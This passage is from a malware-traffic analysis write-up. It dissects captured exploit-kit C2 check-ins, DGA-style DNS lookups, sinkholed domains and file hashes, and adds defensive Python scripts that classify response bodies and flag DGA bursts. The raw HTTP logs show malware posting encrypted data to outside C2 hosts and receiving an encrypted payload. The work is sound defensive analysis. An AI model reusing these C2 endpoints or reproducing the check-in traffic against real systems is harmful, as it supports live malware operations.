– Once the files have been downloaded from the above connections and executed, we see the malware trying to connect to two different IP addresses (52.22.18.194 / 52.21.140.191) on port 843. The connections to these IP addresses appear to be blocked, since we only see the SYN packet being sent and no response from the other end. (TCP 843 is also the port Flash Player uses to fetch its master socket-policy file, so unanswered SYNs to 843 are not on their own proof of C2; here it is the timing, right after the payload download, that ties them to the infection.)
Once again I am reminded why it is a good idea to block all outbound connections except to well-known ports (80/443/465/995/etc.) and to keep logs of any/all of that traffic. Granted, one then needs to be able to ingest those logs and make sense of them as well. And don't forget about your exceptions and having an exception process!
And now for the call-backs from the malware that was deposited on the system. Note the X-Sinkhole: malware-sinkhole header in the response: by the time of this capture rnhbhnlmpvvdt[.]com was answering from a sinkhole, so this check-in never reached the real C2:
POST /include/class_dm_event.php HTTP/1.1
Connection: Keep-Alive
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 263
Host: rnhbhnlmpvvdt.com

ogis0=uq+2TOoO36/E3djA7FAY+qOQp6njry09&e=3HcbGddeYpGhIaiiCgDfit2Ka6pwf9z6U9SV&oaqe=Yr7rA6V7flvNGrf/TshfqMLu0k6Bvq3tSPELVxAJkdC65dMe&oumkmm1=AmLf8T37jecJCNXacLepDLfFjH1UivyisxI5XCUaa2zjQ9meadjT8qdYm+fj&y=nrOdI1OUNk+70KCnnMpGUpEo7syABmmqvaGuLIvDIq2fMn41gBBeaYeVvW0=

HTTP/1.1 200 OK
Date: Tue, 24 Nov 2015 16:17:22 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.10
X-Sinkhole: malware-sinkhole
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=1
Connection: Keep-Alive
Content-Type: text/html
Interestingly enough, we can see a couple of POST requests being made to the server, but the responses from the server have a Content-Type of “application/octet-stream.” Since these are responses from the server, I do not believe that these are binary files at this time:
POST /include/functions_newpost.php HTTP/1.1
Connection: Keep-Alive
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 277
Host: ncqauqvqqhhzpc.com

skgkmuq=2NKRclhTaaVcZfcfyHVUbhwfSld0Zju7&ewueoc=PswwbVqsNwbSgcqfG6gImfag&c=9JK1TVsiirO56TNCRSpf9LksdgM7&msmui=lBJh+rlt3H8VdbhdKI0280o2&y0=2qPbVGijLyJymtapuwZaLfNm7Kgmj5GtWigUmWGFfOqZ&k=/A+hPvXyhmaoXk/ARfa6o/7Q7OhyrnOoFe3+Ocq/dvhHHXzRR3e/&mgacue=b/1tQDvJswplB85kjSLVc4kED+uPy2U=

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 24 Nov 2015 16:16:42 GMT
Content-Type: application/octet-stream
Content-Length: 587
Connection: keep-alive
Set-Cookie: PHPSESSID=9b6f301d3b6400079694d341333b6959; expires=Wed, 25-Nov-2015 16:16:42 GMT
Set-Cookie: walkover=6258; expires=Wed, 25-Nov-2015 16:16:42 GMT
Set-Cookie: rigidity=7597; expires=Wed, 25-Nov-2015 16:16:42 GMT
Set-Cookie: staunching=4382; expires=Wed, 25-Nov-2015 16:16:42 GMT
-----
POST /newthread.php HTTP/1.1
Connection: Keep-Alive
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
Referer: http://lnhxwmhoyjxqmtgn9u.com/search.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 214
Host: ncqauqvqqhhzpc.com

moycq=uskrE77T5r1UtuRf&esuyuc=5EogXNdl7mULw6YgehMEBu4n&eicww5=JN8vwWDSDeUquJeK&my=QgXKqX/MgvVEp/o1IfmO&we=sfFo65FUZ5QDgmswsUkkj2Fg&wkmekkc=UZDILSO9ndxh/s7z&m=N/0xqJ/9awqYtpKpX6eb6939K4FBS4Qy0au/Zwn3IbHiS9IQjG3yN7M=

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 24 Nov 2015 16:16:45 GMT
Content-Type: application/octet-stream
Content-Length: 671932
Connection: keep-alive
Set-Cookie: PHPSESSID=52f98d522ab4e44a8cf557ed9830dc51; expires=Wed, 25-Nov-2015 16:16:45 GMT
Set-Cookie: zebra=5401; expires=Wed, 25-Nov-2015 16:16:45 GMT
Set-Cookie: spittle=7253; expires=Wed, 25-Nov-2015 16:16:45 GMT
Set-Cookie: saffrons=3122; expires=Wed, 25-Nov-2015 16:16:45 GMT
Set-Cookie: revisiting=3533; expires=Wed, 25-Nov-2015 16:16:45 GMT
Set-Cookie: yogi=4911; expires=Wed, 25-Nov-2015 16:16:45 GMT
-----
POST /blog_ajax.php HTTP/1.1
Connection: Keep-Alive
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
Referer: http://ncqauqvqqhhzpc.com/newthread.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 996
Host: ncqauqvqqhhzpc.com
Cookie: yogi=4911; revisiting=3533; saffrons=3122; spittle=7253; zebra=5401; PHPSESSID=52f98d522ab4e44a8cf557ed9830dc51

c1=gmxF3phTjC+8OFSGFNCdljAPS0FGt3OrKkO2rt71bkoTFgcUyJcx/3Pm+fQoubED4QiA1EGXVmmKkLotN6lYw0rZ83NSrcQwLJmoJXa7pNalVstc&wciqei=+Wh9WDa2CTJA6H07QIzW9BWR14ILJumro+UojZayYUYndmrStcwZqEanE6tnooX2bUl2lDl9Q0SiMMR6iOdPYGXmqKxntkC54efmn9ECKLWoykp0KoowkyeLRTHVc73xFPPbVGlrEmgjqXg/Tu0RyFCKoJmJW699rsZ0NK9dtCPbpZCw3iIPVJMLiQXQ9uRs6TGHaYoiH78+D8fgAY0Aq1A3&qeoqeeq=Q+fWoMnvsrmEM8iDyNIz7ccDVeRmhcoFeUrCD6+gnHYbXB748S6h0o7E2zxXxC3aH+PgDIesUKaAbT3TABkWNQFglVRXEeaIs4+4S4Wa/2wODHbbgzofHqucgiqz4RJg&oi=aMKP8Kk4nh8286Us7L/9VTrztIDRNq/I3jJJpkO+WD9DuVtYgWnaXtR1hiYFBE06Wy6wyjzSBDI9HqcKBYPoNlQ9PZ10hXbmJcNK1qnv+NlTAt51TEyBbQ4er0b2JF1lQK0WIhKGbwAFbmY7pqUMgPo5yV+b+nYcCh3pHU43&mium5=4lH4p7o6NX+W0FxYJBt8L26UFaZ4sqGRyvg58sZZDUYn1eynh5+s3rpYOvlqWylYiqV7NzYiGPqN/BeArceWuphTwo1aXyn+GTHoHi7CnLrfSnYmcqxEg3yjC4jlBCUAQirXOL0KccjnincV6uLUQELc&moo=qf44CM+7QIwIOumHRqN59g8R4FzuCM0JLyITIC3+X16YW7egCD4z86y/wZQUVUWhRArANwZdDj1ixy/fHlSwEBN4RoBl/L+iQSohJcSqNgLIfIOyopy7Bzqmr8zCcErpZYANscig7vbesHGijVmeuupkHodtFABMBc6Hj8+MfMCLNoHLDQY04qJf

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 24 Nov 2015 16:17:08 GMT
Content-Type: application/octet-stream
Content-Length: 37
Connection: keep-alive

.J..........|...4.+...+....3.g2M.....
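Whether an octet-stream body is a binary worth carving is better answered from its first bytes than from the header. The added example below is mine, not from the post: it splits a raw HTTP response, sniffs the body for the file headers that matter in exploit-kit traffic (MZ for a PE, CWS/FWS/ZWS for Flash, a few archive types), measures the body's entropy, compares the result with what the server declared, and surfaces the X-Sinkhole header seen above. The sample responses are constructed from headers quoted in this write-up with short stand-in bodies, so their Content-Length values are set to match those bodies rather than the real sizes.

```python
import math
from collections import Counter
from typing import Dict, Tuple

# File headers that matter in exploit-kit traffic. A body that starts with none
# of these is either text or an opaque (encrypted / custom-encoded) blob.
MAGIC = [
    (b"MZ", "pe-executable"),
    (b"CWS", "swf-zlib"), (b"FWS", "swf-uncompressed"), (b"ZWS", "swf-lzma"),
    (b"%PDF", "pdf"), (b"PK\x03\x04", "zip"), (b"\x1f\x8b", "gzip"),
]

# Constructed samples: response headers quoted in this write-up, with short
# stand-in bodies (and Content-Length adjusted to match them).
SWF_RESPONSE = (b"HTTP/1.1 200 OK\r\nServer: nginx/1.8.0\r\n"
                b"Content-Type: application/x-shockwave-flash\r\nContent-Length: 16\r\n\r\n"
                b"CWS\x0b" + b"\x00" * 12)
SINKHOLE_RESPONSE = (b"HTTP/1.1 200 OK\r\nServer: Apache/2.2.20 (Ubuntu)\r\n"
                     b"X-Sinkhole: malware-sinkhole\r\nContent-Length: 0\r\n"
                     b"Content-Type: text/html\r\n\r\n")
OCTET_RESPONSE = (b"HTTP/1.1 200 OK\r\nServer: nginx\r\n"
                  b"Content-Type: application/octet-stream\r\nContent-Length: 256\r\n\r\n"
                  + bytes(range(256)))          # stand-in for an encrypted blob

def split_response(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Split a raw response into status line, lower-cased header dict and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; 8.0 means every byte value equally likely."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def sniff(body: bytes) -> str:
    """Classify a body by magic bytes, then by printability, then by entropy."""
    if not body:
        return "empty"
    for prefix, label in MAGIC:
        if body.startswith(prefix):
            return label
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in body)
    if printable / len(body) > 0.95:
        return "text"
    return "opaque-high-entropy" if entropy(body) > 7.0 else "opaque"

def triage(raw: bytes) -> Dict:
    """Compare what the server declared with what the body actually is."""
    status, headers, body = split_response(raw)
    declared = headers.get("content-type", "").split(";")[0].strip().lower()
    kind = sniff(body)
    notes = []
    if declared == "application/octet-stream" and kind.startswith("opaque"):
        notes.append("octet-stream body with no known file header: encrypted or custom-encoded payload")
    if kind.startswith("swf") and declared != "application/x-shockwave-flash":
        notes.append("Flash file served under a non-Flash Content-Type")
    if kind == "pe-executable":
        notes.append("PE executable delivered over HTTP")
    if "x-sinkhole" in headers:
        notes.append("server identifies itself as a sinkhole: " + headers["x-sinkhole"])
    length = headers.get("content-length")
    if length is not None and int(length) != len(body):
        notes.append(f"Content-Length {length} does not match body size {len(body)} (truncated capture?)")
    return {"status": status, "declared": declared, "sniffed": kind,
            "entropy": round(entropy(body), 2), "notes": notes}

if __name__ == "__main__":
    for raw in (SWF_RESPONSE, SINKHOLE_RESPONSE, OCTET_RESPONSE):
        print(triage(raw))
```

The useful outcome for this capture is the third case: a large application/octet-stream body with no MZ header and near-maximal entropy is exactly what an encrypted payload looks like on the wire, which is consistent with the in-memory, encrypted-binary behaviour mentioned at the top of the post and with the files not running in a VM as-is.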
We then see the last POST, this time to a different server (and with a different User-Agent string, the MSIE 7.0 one, rather than the rv:11.0 string used so far):
POST /news.php HTTP/1.0
Host: chin.truffleman.co.uk
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 705
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

./6.P.@...(.....5^..?.=..o..}...4...p.:.....?.IF3r+E.i...P.<.+.....5....mpz......wpB..I..h....O.sn..=..fX.+..n.U5...".....u..:>JiS..1&..5.[v...B9...n.....?..y....[...qO.7zafv..L$.,s.c..m.Db;."..+r.=......P.._...!3.jt........b.A....d%.Ck..PDj3*...,...N#`.RQ.....^.J. ..X.C.C..8.+bzh..j..=H4.e.....eW.~.).`.kP....w...H....4..`Ui!vai).\.l...x.N....N.D.CA..z.K]:..........J.;...cQ...e..L^.^..}...R...0..G\.+..x..#...6.i.Qf....6..-._t.........C.\.!.z`l.-O.=.Vt..l.#...`.}q.r.?...2..,.....8. .z.....p...|K.?.0~9y.5g`./...U0....bA..p.7...l....r.>B..vb......,L..>.......*y^f... 3&K..]:5;.B."...q.z'.%.b..7..W..7.(.Sb.{}....A...d3..3.l2!......(Z...~......E....F.{k(k..I......[2..........j`....Yn.d.m.....<....-....

HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Tue, 24 Nov 2015 16:16:57 GMT
Content-Type: text/html; charset=windows-1251
Connection: close

......L.<a. }.&...|.
One more thing to mention: there was a fair number of DNS lookups that looked abnormal. Please note that Chrome's DNS pre-fetching can cause some odd-looking domains to be looked up as well (http://groups.google.com/a/chromium.org/forum/#!topic/chromium-discuss/F70-k_PGhEg); the browser in this capture is Internet Explorer 11, judging by the User-Agent, so that does not account for these. Here is the list of FQDNs that looked odd to me in the PCAP, with what each one resolved to:
> jtikbwiyllxnyi61.com – No such name
> ghgmtcrluvghlwc91.com – A 127.0.1.1 (queried twice)
> qidxwsfqblej.com – No such name
> lnhxwmhoyjxqmtgn9u.com – A 127.0.1.1 (queried twice)
> hsgxnjpdzifkjl4r.com – No such name
> xwhrskktvevezz0.com – No such name
> rnhbhnlmpvvdt.com – A 166.78.145.90 (queried twice)
> qtllebdadvitdim.com – No such name
> wyvpeiyaxycznuia6.com – No such name
> ncqauqvqqhhzpc.com – A 95.211.205.229 (queried twice)
> chin.truffleman.co.uk – A 151.80.126.226
Frame numbers, timestamps and transaction IDs for these lookups are in the DNS list above: eleven distinct domains in about 17 seconds, six answered NXDOMAIN, two pointed at loopback and three resolved to real addresses.
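As an added example (my code, not part of the original post), the script below does in code what the eye does over that list: it pairs each query with its response on transaction ID and client port, classifies the answer as NXDOMAIN, loopback or resolved, and flags a client that looks up many new domains in a short window with mostly failed answers, which is the behaviour of a domain-generation algorithm hunting for a live C2. The input is a subset of the tshark-style lines quoted earlier in this post; the 60-second window, five-domain minimum and 50 % failed-answer ratio are my own tuning choices, not values from the page.

```python
import ipaddress
import re
from collections import defaultdict
from typing import Dict, List

# Constructed sample: a subset of the tshark-style DNS lines quoted above
# (query/response pairs from the infected host to 8.8.4.4).
SAMPLE = """\
11981 176.540744 10.1.25.119 63767 8.8.4.4 53 DNS Standard query 0x2749 A jtikbwiyllxnyi61.com
11983 176.819935 8.8.4.4 53 10.1.25.119 63767 DNS Standard query response 0x2749 No such name
11984 176.821924 10.1.25.119 60109 8.8.4.4 53 DNS Standard query 0xc23c A ghgmtcrluvghlwc91.com
11988 176.915258 8.8.4.4 53 10.1.25.119 60109 DNS Standard query response 0xc23c A 127.0.1.1
11989 176.926720 10.1.25.119 58168 8.8.4.4 53 DNS Standard query 0x5cc3 A ghgmtcrluvghlwc91.com
11990 177.005193 8.8.4.4 53 10.1.25.119 58168 DNS Standard query response 0x5cc3 A 127.0.1.1
11997 178.041367 10.1.25.119 57199 8.8.4.4 53 DNS Standard query 0x043c A qidxwsfqblej.com
11998 178.171919 8.8.4.4 53 10.1.25.119 57199 DNS Standard query response 0x043c No such name
11999 178.173503 10.1.25.119 58882 8.8.4.4 53 DNS Standard query 0xdad5 A lnhxwmhoyjxqmtgn9u.com
12000 178.254598 8.8.4.4 53 10.1.25.119 58882 DNS Standard query response 0xdad5 A 127.0.1.1
12040 179.351621 10.1.25.119 53261 8.8.4.4 53 DNS Standard query 0xf345 A hsgxnjpdzifkjl4r.com
12068 179.449632 8.8.4.4 53 10.1.25.119 53261 DNS Standard query response 0xf345 No such name
12073 179.452374 10.1.25.119 62977 8.8.4.4 53 DNS Standard query 0x57eb A xwhrskktvevezz0.com
12112 179.540378 8.8.4.4 53 10.1.25.119 62977 DNS Standard query response 0x57eb No such name
12113 179.542265 10.1.25.119 50010 8.8.4.4 53 DNS Standard query 0x2997 A rnhbhnlmpvvdt.com
12158 179.651092 8.8.4.4 53 10.1.25.119 50010 DNS Standard query response 0x2997 A 166.78.145.90
12373 180.157299 10.1.25.119 49396 8.8.4.4 53 DNS Standard query 0xb029 A ncqauqvqqhhzpc.com
12411 180.238941 8.8.4.4 53 10.1.25.119 49396 DNS Standard query response 0xb029 A 95.211.205.229
13636 193.071344 10.1.25.119 55508 8.8.4.4 53 DNS Standard query 0x8551 A chin.truffleman.co.uk
13637 193.272985 8.8.4.4 53 10.1.25.119 55508 DNS Standard query response 0x8551 A 151.80.126.226
"""

LINE = re.compile(
    r"^(?P<frame>\d+)\s+(?P<time>[\d.]+)\s+(?P<src>\S+)\s+(?P<sport>\d+)\s+(?P<dst>\S+)\s+(?P<dport>\d+)"
    r"\s+DNS\s+Standard query (?P<resp>response )?(?P<txid>0x[0-9a-fA-F]{4})\s+(?P<rest>.*)$")

def _ip(token: str):
    """The token as an IP address object, or None if it is not one."""
    try:
        return ipaddress.ip_address(token)
    except ValueError:
        return None

def classify(rest: str, answers: list) -> str:
    if rest.startswith("No such name"):
        return "NXDOMAIN"
    if answers and all(a.is_loopback for a in answers):
        return "LOOPBACK"          # an A record deliberately pointed at 127/8
    return "RESOLVED" if answers else "NOANSWER"

def parse_dns_lines(lines) -> List[Dict]:
    """Pair queries with responses on (client, client port, txid)."""
    pending, results = {}, []
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue
        if m.group("resp") is None:
            qtype, qname = m.group("rest").split(None, 1)
            pending[(m.group("src"), m.group("sport"), m.group("txid"))] = {
                "time": float(m.group("time")), "client": m.group("src"),
                "qtype": qtype, "qname": qname.rstrip(".").lower()}
        else:
            q = pending.pop((m.group("dst"), m.group("dport"), m.group("txid")), None)
            if q is None:
                continue                     # response to a query we never saw
            answers = [ip for ip in map(_ip, m.group("rest").split()) if ip]
            q["answers"] = [str(a) for a in answers]
            q["verdict"] = classify(m.group("rest"), answers)
            results.append(q)
    return results

def dga_like_clients(results, window_s=60.0, min_domains=5, min_failed_ratio=0.5) -> Dict[str, Dict]:
    """Flag a client whose first lookups of many distinct domains fall inside one
    window and mostly come back NXDOMAIN or loopback. Thresholds are assumptions."""
    by_client = defaultdict(dict)
    for r in sorted(results, key=lambda r: r["time"]):
        by_client[r["client"]].setdefault(r["qname"], r)   # keep first lookup only
    flagged = {}
    for client, first in by_client.items():
        firsts = sorted(first.values(), key=lambda r: r["time"])
        for i, start in enumerate(firsts):
            window = [r for r in firsts[i:] if r["time"] - start["time"] <= window_s]
            failed = sum(r["verdict"] in ("NXDOMAIN", "LOOPBACK") for r in window)
            if len(window) >= min_domains and failed / len(window) >= min_failed_ratio:
                flagged[client] = {"domains": len(window), "failed": failed,
                                   "names": [r["qname"] for r in window]}
                break
    return flagged

if __name__ == "__main__":
    parsed = parse_dns_lines(SAMPLE.splitlines())
    for r in parsed:
        print(f'{r["time"]:>10.3f} {r["verdict"]:<9} {r["qname"]} {",".join(r["answers"])}')
    print(dga_like_clients(parsed))
```

Two details are worth keeping in mind. A 127.0.1.1 answer is not "the domain does not exist": it is an A record somebody published, and a domain in a burst like this that resolves to loopback is commonly one that has been registered and pointed at localhost to neutralise it, the same idea as the X-Sinkhole header seen at the HTTP layer. And repeated lookups of the same name are collapsed to the first one, so a resolver retry does not inflate the count.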
Results from Snort via Security Onion (ET rules):
=================================================
VirusTotal links for links and files found:
===========================================
File Name: neuhaus-who.olp.swf
MD5: e7540e851a7334a3ce068e772b205ece
SHA256: d0b17166e0f1557468536bb303d3408e827952761703c3a67f4724678e3b88e9
First submission: 2015-12-04 14:39:03 UTC
Detection ratio: 6 / 55
Virustotal link: http://www.virustotal.com/en/file/d0b17166e0f1557468536bb303d3408e827952761703c3a67f4724678e3b88e9/analysis/1449239943/
Hybrid-Analysis link (Windows 7 x64): http://www.hybrid-analysis.com/sample/d0b17166e0f1557468536bb303d3408e827952761703c3a67f4724678e3b88e9?environmentId=2
Hybrid-Analysis link (Windows 7 x32): http://www.hybrid-analysis.com/sample/d0b17166e0f1557468536bb303d3408e827952761703c3a67f4724678e3b88e9?environmentId=1
Malwr link: http://malwr.com/analysis/ZTgzN2QxODY5ZjcxNGZlYWFjYzM1ZDQxMDUxNjQ2MjM/
File Name: neuhaus-literature.disco.exe
MD5: 478294cf3367385f8715198fa27d0305
SHA256: f868ab2a5208891bdbbd02a85d2d1a3757ae74685504b99f192cdb12fc9eace8
First submission: 2015-12-04 15:26:43 UTC
Detection ratio: 0 / 55
Virustotal link: http://www.virustotal.com/en/file/f868ab2a5208891bdbbd02a85d2d1a3757ae74685504b99f192cdb12fc9eace8/analysis/1449242803/
File Name: neuhaus-yes.wbxml.exe
MD5: 478294cf3367385f8715198fa27d0305
SHA256: f868ab2a5208891bdbbd02a85d2d1a3757ae74685504b99f192cdb12fc9eace8
First submission: 2015-12-04 15:26:43 UTC
Detection ratio: 0 / 55
Virustotal link: http://www.virustotal.com/en/file/f868ab2a5208891bdbbd02a85d2d1a3757ae74685504b99f192cdb12fc9eace8/analysis/1449242803/
Note: this is the same file as neuhaus-literature.disco.exe (identical SHA256, and both downloads were 660972 bytes); the second GET simply fetched it again under a different name.